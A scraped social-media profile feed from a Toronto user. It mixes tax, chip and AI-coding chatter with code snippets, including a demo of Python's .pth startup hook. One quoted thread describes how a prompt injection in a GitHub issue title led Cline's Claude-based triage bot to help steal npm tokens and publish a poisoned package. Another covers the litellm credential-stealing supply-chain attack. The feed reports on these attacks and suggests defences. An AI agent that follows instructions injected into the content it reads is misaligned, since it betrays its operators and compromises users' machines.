Bob Loblaw
@cburatto · 2.4K posts

Trying to make all possible mistakes, just not all at the same time.

Toronto, Ontario · Joined February 2010
1.4K Following · 110 Followers
Bob Loblaw @cburatto
@renanhiramatsu Example: a sale of 100 in BR, 15 withheld as income tax. The LLC owes 20 in the US on that BR revenue. You present the withholding and pay the difference of 5 at the LLC. Obviously, don't take advice from strangers on the Internet :-)
1 reply · 0 reposts · 1 like · 76 views
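
A minimal sketch of the credit arithmetic in the two replies above, assuming the simple treaty treatment described there (foreign withholding credited against the LLC's US liability, capped at that liability). The function name and numbers are illustrative only, not tax advice:

```python
# Illustrative sketch of the treaty-credit logic described in the replies
# above; names and numbers are hypothetical, and this is not tax advice.

def us_tax_due_after_credit(us_liability: float, foreign_withheld: float) -> float:
    """Foreign withholding is credited against the US liability,
    but the credit is capped at what the LLC actually owes."""
    credit = min(foreign_withheld, us_liability)
    return us_liability - credit

# The example from the thread: sale of 100 in BR, 15 withheld, LLC owes 20.
print(us_tax_due_after_credit(20, 15))  # -> 5 (pay the difference)
# The caveat from the thread: if 15 is withheld but the LLC only owes 10,
# the excess 5 cannot be deducted.
print(us_tax_due_after_credit(10, 15))  # -> 0
```
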
Bob Loblaw @cburatto
@renanhiramatsu Are you sure? If Apple is withholding tax, you would declare that payment as tax withheld, and it gets deducted from what your LLC owes. BR-US tax treaty. The only downside is when the withheld tax is higher than the tax due at the LLC, since you can only deduct up to what the LLC owes. +
1 reply · 0 reposts · 1 like · 70 views
renan h. @renanhiramatsu
In 2025 I paid a Porsche's worth of taxes to Brazil on my App Store apps. And I don't even live there. Why? Every month Apple withholds around 15-17% of my monthly payout as IRRF (Brazilian withholding income tax). Image attached for anyone who wants to know the net revenue you'll get if you sell to BR through an LLC.
[attached image]
8 replies · 4 reposts · 86 likes · 10.2K views
Bob Loblaw @cburatto
@FernandoCruz_21 We traded a Beetle for a Tesla. It has Autopilot, but the moment it disengages, you still have to know how to drive.
0 replies · 0 reposts · 2 likes · 276 views
Fernando Cruz → allowa.tech @FernandoCruz_21
No, man, you still haven't understood it, yet you keep harping on this idea that the code barrier is dead. Devs may not "write" code anymore, but they strictly guide how the code should be written, a skill you don't have. Just as I don't understand filmmaking, and even with AI I'd struggle to make the cinematic videos you make; I believe you understand lighting, scripts, camera angles, etc. Building software is much more than just anyone writing code. You even tried, you got exposed, and the code that was there was so bad it was a joke. When you keep carelessly repeating that the code barrier is dead to a relatively large audience, you're just leading more people into going through what you went through, and even worse things. And just for your information, the reports indicate that dev hiring has increased.
Abraham @Abraham_Abrahub

@FernandoCruz_21 Yes, the security lesson has been learned. It's no joke. But I still believe the code barrier is dead; devs themselves are admitting they don't write code anymore lol

14 replies · 12 reposts · 299 likes · 15.2K views
Kevin A. Bryan @Afinetheorem
@cburatto @karpathy It is wild to me that folks are using OpenClaw at all. It's just asking for your computer to get nuked.
1 reply · 0 reposts · 1 like · 24 views
Andrej Karpathy @karpathy
Software horror: litellm PyPI supply chain attack. A simple `pip install litellm` was enough to exfiltrate SSH keys, AWS/GCP/Azure creds, Kubernetes configs, git credentials, env vars (all your API keys), shell history, crypto wallets, SSL private keys, CI/CD secrets, database passwords.

LiteLLM itself has 97 million downloads per month, which is already terrible, but much worse, the contagion spreads to any project that depends on litellm. For example, if you did `pip install dspy` (which depended on litellm>=1.64.0), you'd also be pwned. Same for any other large project that depended on litellm. Afaict the poisoned version was up for less than ~1 hour.

The attack had a bug which led to its discovery: Callum McMahon was using an MCP plugin inside Cursor that pulled in litellm as a transitive dependency. When litellm 1.82.8 installed, their machine ran out of RAM and crashed. So if the attacker hadn't vibe coded this attack, it could have gone undetected for many days or weeks.

Supply chain attacks like this are basically the scariest thing imaginable in modern software. Every time you install any dependency you could be pulling in a poisoned package anywhere deep inside its entire dependency tree. This is especially risky with large projects that might have lots and lots of dependencies. The credentials that get stolen in each attack can then be used to take over more accounts and compromise more packages.

Classical software engineering would have you believe that dependencies are good (we're building pyramids from bricks), but imo this has to be re-evaluated, and it's why I've grown increasingly averse to them, preferring to use LLMs to "yoink" functionality when it's simple enough and possible.
Daniel Hnyk @hnykda

LiteLLM HAS BEEN COMPROMISED, DO NOT UPDATE. We just discovered that LiteLLM PyPI release 1.82.8 has been compromised: it contains litellm_init.pth with base64-encoded instructions to send all the credentials it can find to a remote server + self-replicate. link below

1.4K replies · 5.4K reposts · 28K likes · 66.4M views
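
For context on why a poisoned `litellm_init.pth` is such an effective payload: CPython's `site` module executes any line of a site-packages `.pth` file that begins with `import` on every interpreter startup. Here is a benign sketch of that mechanism; the file name is illustrative, not the attacker's, and it should only be run in a throwaway virtualenv:

```python
# Benign demo of the .pth startup hook behind the litellm payload.
# site.py executes any .pth line starting with "import" at every startup,
# so one dropped line runs arbitrary code on each `python` invocation.
import pathlib
import site

site_packages = pathlib.Path(site.getsitepackages()[0])
hook = site_packages / "demo_startup_hook.pth"  # illustrative name
# A single line starting with "import" is enough to run arbitrary code.
hook.write_text('import sys; sys.stderr.write(".pth hook ran at startup\\n")\n')
print(f"Wrote {hook}; launch a new `python` to see it fire, then delete it.")
```
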
Bob Loblaw @cburatto
@dfolloni @cline Sandboxing, dedicated credentials with the fewest rights possible (OAuth apps instead of simply giving your password to openclaw), hooks or MCPs for potentially catastrophic actions, with a second agent reviewing and escalating to the user. What else?
0 replies · 0 reposts · 1 like · 116 views
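
A rough sketch of the "hooks with a second reviewer" idea from the reply above: a pre-execution gate that denies obviously catastrophic commands, escalates sensitive ones to the user, and lets the rest through. The risk patterns and function names here are hypothetical, not any specific agent framework's API:

```python
import re

# Hypothetical risk patterns; illustrative, not remotely exhaustive.
DENY = [r"\brm\s+-rf\s+/", r"curl[^|]*\|\s*sh"]
ESCALATE = [r"\bgit\s+push\b", r"\bnpm\s+publish\b", r"\baws\b", r"\bkubectl\b"]

def review_command(cmd: str) -> str:
    """Pre-execution hook: deny catastrophic commands outright,
    escalate credential/deploy actions to a human, allow the rest."""
    if any(re.search(p, cmd) for p in DENY):
        return "deny"
    if any(re.search(p, cmd) for p in ESCALATE):
        answer = input(f"Agent wants to run: {cmd!r} -- allow? [y/N] ")
        return "allow" if answer.strip().lower() == "y" else "deny"
    return "allow"

if __name__ == "__main__":
    print(review_command("ls -la"))       # allow
    print(review_command("npm publish"))  # escalates to the user
```
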
Deborah Folloni → 🪽epic.new
A hacker simply hacked @cline and installed OpenClaw on 4,000 computers via prompt injection 🫠 Look how crazy this is:
- The Cline team had set up an automated issue-triage workflow on GitHub, using Claude itself to read and categorize tickets
- The hacker opened an issue with a prompt injection in the title; Claude read it, thought it was a legitimate instruction, and executed it
- With that, he filled the GitHub cache with junk until the legitimate build caches were forced out, replaced them with poisoned caches, and stole the npm publishing tokens
- With the tokens in hand, he published a new version of cline that looked identical to the previous one, except for one extra little line in package.json: "postinstall": "npm install -g openclaw@latest"

Result: 4,000 devs installed openclaw on their machines without knowing (aka an agent with full access to your computer) 🥲

Very important to remember that AIs have no sense of malice, which is why prompt injections are, in my opinion, their biggest vulnerability. In short, folks: BE CAREFUL. For the full story: thehackernews.com/2026/02/cline-…
61 replies · 265 reposts · 2K likes · 164.8K views
Bob Loblaw @cburatto
@TheNathanNS He should have a new show "Nightmare Gordon Licensees" where he goes to their factories and lashes out.
0 replies · 0 reposts · 0 likes · 561 views
𝔑𝔞𝔱𝔥𝔞𝔫 @TheNathanNS
There's a guy I sometimes watch on YouTube, Gary Eats, who's been to Gordon Ramsay's restaurants and pointed out how poor the quality was. The fact that he's doing the same thing with these frozen meals too is shocking for a man who built a massive chunk of his career on bettering struggling restaurants.
260 replies · 646 reposts · 30.5K likes · 4.4M views
Bob Loblaw @cburatto
@GergelyOrosz Wisdom: having the power to do it, but choosing not to. Yes, this will likely cause some price adjustments, especially as the providers leverage AI themselves. You can build Jira? Jira can now charge 1 dollar per seat. Would you still build it?
0 replies · 0 reposts · 0 likes · 28 views
Pedro Cerize @PedroCerize
This chart explains why I'm absolutely skeptical about renewable energy for ICE. Oil gave energy portability. Today batteries are already doing that. The car as we know it today, driven by a human and propelled by hydrocarbons, will be replaced just as carriages were at the turn of the 20th century. In 50 years, few of today's oil companies will still exist. In investing, it's important to be on the right side of history.
Lucas Di Grassi @LucasdiGrassi

Imagine you have 1 hectare and need to choose the more efficient thing to do with it: sugarcane or solar panels 👇🏻

45 replies · 20 reposts · 553 likes · 74.8K views
Ivan Fioravanti ᯅ @ivanfioravanti
Prompt: Create a complete, single-file HTML Snake game (no external files, no images) that looks and behaves EXACTLY like this specification:
- Retro arcade style with dark background (#0a0a0a) and bright neon green theme (#0f0).
- Use Google font 'Press Start 2P' via @import.
- Canvas size: 420×420 pixels, 21×21 grid (tile size = 20px).
- Snake starts at length 3, moving right.
- Snake head is bright lime (#00ff41) with black eyes that always face the current direction (4 different eye positions).
- Body alternates between two shades of green (#00cc33 and #00aa22).
- Food is a red circle (#ff0044) with a small white highlight.
- Light gray grid lines on the background.
- UI elements:
  - Title "SNAKE" in big retro font + subtitle "AUTOPLAY AI ENABLED BY DEFAULT"
  - Score and Length counters in glowing boxes
  - Two buttons: "PAUSE / RESUME" and "NEW GAME"
  - Status text "🤖 AI AUTOPLAY ACTIVE" in yellow
  - Game Over overlay with big "GAME OVER", final score, and Restart button

Game features:
- Speed: 65ms per tick
- AI autoplay ON by default (uses BFS to find shortest safe path to food, treats body except tail as obstacle)
- If no path to food, fallback to any safe move (prefers continuing in current direction)
- Keyboard support: Arrow keys + WASD (prevent 180° reverse)
- SPACE or P to pause
- Collision with walls or self = game over
- Eating food increases score by 10 and grows snake
- Game auto-starts on load with AI enabled
- Clicking "NEW GAME" fully resets everything

The final output must be ONE complete .html file saved and opened directly in a browser. Make it visually identical to a high-quality retro neon Snake game. Include all CSS inline, no external dependencies except the Google font import.
2 replies · 1 repost · 18 likes · 2.6K views
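
The autoplay rule in the prompt above is plain grid BFS. A small Python sketch of that search, independent of the HTML/canvas part; the coordinates and the 21×21 default mirror the spec, and the tail exclusion follows the prompt's rule that the tail cell frees up on the next tick:

```python
from collections import deque

def bfs_next_move(head, food, body, n=21):
    """Shortest safe path on an n x n grid; returns the first step
    (dx, dy) toward food, or None if no path exists. `body` excludes
    the tail, per the prompt's obstacle rule."""
    blocked = set(body)
    queue = deque([(head, None)])  # (cell, first step taken from head)
    seen = {head}
    while queue:
        (x, y), first = queue.popleft()
        if (x, y) == food:
            return first
        for dx, dy in ((1, 0), (-1, 0), (0, 1), (0, -1)):
            nxt = (x + dx, y + dy)
            if (0 <= nxt[0] < n and 0 <= nxt[1] < n
                    and nxt not in blocked and nxt not in seen):
                seen.add(nxt)
                # Propagate the first step; set it when leaving the head.
                queue.append((nxt, first or (dx, dy)))
    return None  # caller falls back to any safe move

print(bfs_next_move((3, 10), (15, 10), [(2, 10), (1, 10)]))  # -> (1, 0)
```
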
Bob Loblaw @cburatto
@robin_j_brooks People saying Brazil is "just a commodities-based country" should see the cutting-edge tech and management of these commodity businesses. Yes, they are "just commodities", but with operations hard to replicate anywhere else. And with room for improvement.
0 replies · 0 reposts · 0 likes · 105 views
Robin Brooks @robin_j_brooks
So much of Brazil's economic stagnation after 2014 has been linked to corruption, but really it was just about the massive drop in oil prices as US shale came on the world market. Corruption is as bad as ever, but Brazil is back to growing again strongly. robinjbrooks.substack.com/p/brazils-rema…
[attached image]
53 replies · 79 reposts · 615 likes · 70.2K views
Bob Loblaw @cburatto
@aakashgupta Maybe it would be possible to extend an existing chip with "expansion cards" and sustain an 18-to-24-month replacement cycle without much trouble. Model updates would be like adding RAM.
0 replies · 0 reposts · 0 likes · 16 views
Aakash Gupta @aakashgupta
Nvidia paid $20 billion for Groq’s IP. Taalas raised $169 million with 24 employees. And they just demonstrated 8x faster single-model inference than Cerebras on the same Llama 3.1 8B.

The number everyone’s fixating on is the speed. The number that actually matters is the constraint. HC1 runs exactly one model. Llama 3.1 8B, released July 2024, aggressively quantized to 3-bit and 6-bit precision with measurable quality degradation. You can’t swap in a new architecture. You can’t load different weights. If you want to serve Llama 4, you fabricate an entirely new chip.

This tells you everything about what Taalas is actually betting on. They’re betting model release cadences slow down. That enterprises will lock into stable, mature models for 12+ months. That the two-month tapeout cycle they’ve built with TSMC (N6 process, 815 mm2 die, only two metal layers change per model) can keep pace with a frontier that’s still accelerating.

The economics on paper are staggering. 0.75 cents per million tokens versus Cerebras at 10 cents. That’s 13x cheaper. Ten HC1 cards in an air-cooled 2U server pull 2,500 watts total. No HBM, no liquid cooling, no advanced packaging.

The founder, Ljubisa Bajic, cofounded Tenstorrent and grew it to unicorn status before starting Taalas. Jim Keller was his first angel investor. This team has shipped silicon before.

Where it gets interesting is the multi-chip math. Taalas simulated DeepSeek R1 671B across 30 custom HC chips: 12,000 tokens per second at 7.6 cents per million tokens. Nobody has run that in production. Simulated multi-chip inference and production multi-chip inference are different engineering problems with very different failure modes.

The real question is market timing. If model improvements keep delivering large generational gains, the two-month fabrication cycle can’t keep up and you’re perpetually running yesterday’s model in silicon. If improvements plateau and enterprises standardize on stable versions for their highest-volume workloads, Taalas wins on pure economics. Medical devices don’t hot-swap models mid-certification. Satellites don’t patch weights in orbit.

Nvidia just priced Groq’s fast-inference approach at $20 billion. A 24-person team in a different corner of the same design space just showed 45x the single-model throughput of a B200. The acquisition math writes itself. Whether the production math does is the $169 million bet.
Wildminder @wildmindai

17,000 tokens per second!! Read that again! The LLM is hard-wired directly into silicon: no HBM, no liquid cooling, just raw specialized hardware. 10x faster and 20x cheaper than a B200. The "waiting for the LLM to think" era is dead. Code generates at the speed of human thought. Transition from brute-force GPU clusters to actual AI appliances. taalas.com/the-path-to-ub…

89 replies · 93 reposts · 929 likes · 146.9K views
Bob Loblaw @cburatto
@dhh Crazy. Suppose training plateaus at some point. Etch Claude Opus 10 onto this thing. You'd need to replace it every X months. Or just run it locally, assume replacement at laptop rates, and focus research on "knowledge expansion cards".
0 replies · 0 reposts · 0 likes · 191 views
DHH @dhh
Taalas is crazy. My go-to (ha!) prompt for creating a simple wiki system in 0.062s with 15,000 tok/sec?! It looks like it's cheating, but it's real. Unbelievable. chatjimmy.ai
[attached image]
79 replies · 50 reposts · 1.3K likes · 130.5K views
Bob Loblaw @cburatto
@burkov Tell it what you are going to say. Say it. Tell it what you said.
0 replies · 0 reposts · 1 like · 259 views
BURKOV @burkov
LLMs process text from left to right — each token can only look back at what came before it, never forward. This means that when you write a long prompt with context at the beginning and a question at the end, the model answers the question having "seen" the context, but the context tokens were processed without any awareness of what question was coming. This asymmetry is a basic structural property of how these models work.

The paper asks what happens if you just send the prompt twice in a row, so that every part of the input gets a second pass where it can attend to every other part. The answer is that accuracy goes up across seven different benchmarks and seven different models (from the Gemini, ChatGPT, Claude, and DeepSeek series of LLMs), with no increase in the length of the model's output and no meaningful increase in response time — because processing the input is done in parallel by the hardware anyway. There are no new losses to compute, no finetuning, no clever prompt engineering beyond the repetition itself.

The gap between this technique and doing nothing is sometimes small, sometimes large (one model went from 21% to 97% on a task involving finding a name in a list). If you are thinking about how to get better results from these models without paying for longer outputs or slower responses, that's a fairly concrete and low-effort finding.

Read with AI tutor: chapterpal.com/s/1b15378b/pro…
Get the PDF: arxiv.org/pdf/2512.14982
[attached image]
393 replies · 1.1K reposts · 11.6K likes · 3M views
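
The repetition trick the paper tests is a one-liner to try. A hedged sketch, assuming the OpenAI Python SDK; the model name is illustrative, and any chat-style API works the same way:

```python
from openai import OpenAI  # assumes the OpenAI Python SDK is installed

client = OpenAI()

def ask_twice(prompt: str, model: str = "gpt-4o-mini") -> str:
    """Send the prompt twice in one input, as in the paper: the second
    copy can attend to the first, giving every token a second pass over
    the full context without lengthening the model's output."""
    doubled = f"{prompt}\n\n{prompt}"
    resp = client.chat.completions.create(
        model=model,  # illustrative model name
        messages=[{"role": "user", "content": doubled}],
    )
    return resp.choices[0].message.content
```
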
Bob Loblaw @cburatto
@rockatanescu @GergelyOrosz Maybe Heroku is already dead and it is not worth keeping the lights on for 3 users. Do you know of any big users?
1 reply · 0 reposts · 0 likes · 43 views
Andrei Maxim @rockatanescu
@GergelyOrosz I hope somebody explains what the benefit is of putting Heroku in KTLO mode at a time when everybody will want to build their own apps and will need a simple PaaS to deploy to, with easy integration with all these third-party services.
4 replies · 0 reposts · 33 likes · 2.1K views
Gergely Orosz @GergelyOrosz
Translation of this nonsense corporate talk:
“We will be killing Heroku
Not today and not tomorrow
But don’t say we didn’t warn you
PS: I’m just a marketing guy here and they told me to write something that legal would approve so here you go:”
Heroku @heroku

Heroku is transitioning to a sustaining engineering model focused on stability, security, reliability, and support. Heroku remains an actively supported, production-ready platform, with an emphasis on maintaining quality and operational excellence rather than introducing new features. We know changes like this can raise questions, and we want to be clear about what this means for customers.

There is no change for customers using Heroku today. Customers who pay via credit card in the Heroku dashboard—both existing and new—can continue to use Heroku with no changes to pricing, billing, service, or day-to-day usage. Core platform functionality, including applications, pipelines, teams, and add-ons, is unaffected, and customers can continue to rely on Heroku for their production, business-critical workloads.

Enterprise Account contracts will no longer be offered to new customers. Existing Enterprise subscriptions and support contracts will continue to be fully honored and may renew as usual.

Why this change: We’re focusing our product and engineering investments on areas where we can deliver the greatest long-term customer value, including helping organizations build and deploy enterprise-grade AI in a secure and trusted way.

24 replies · 30 reposts · 831 likes · 65.5K views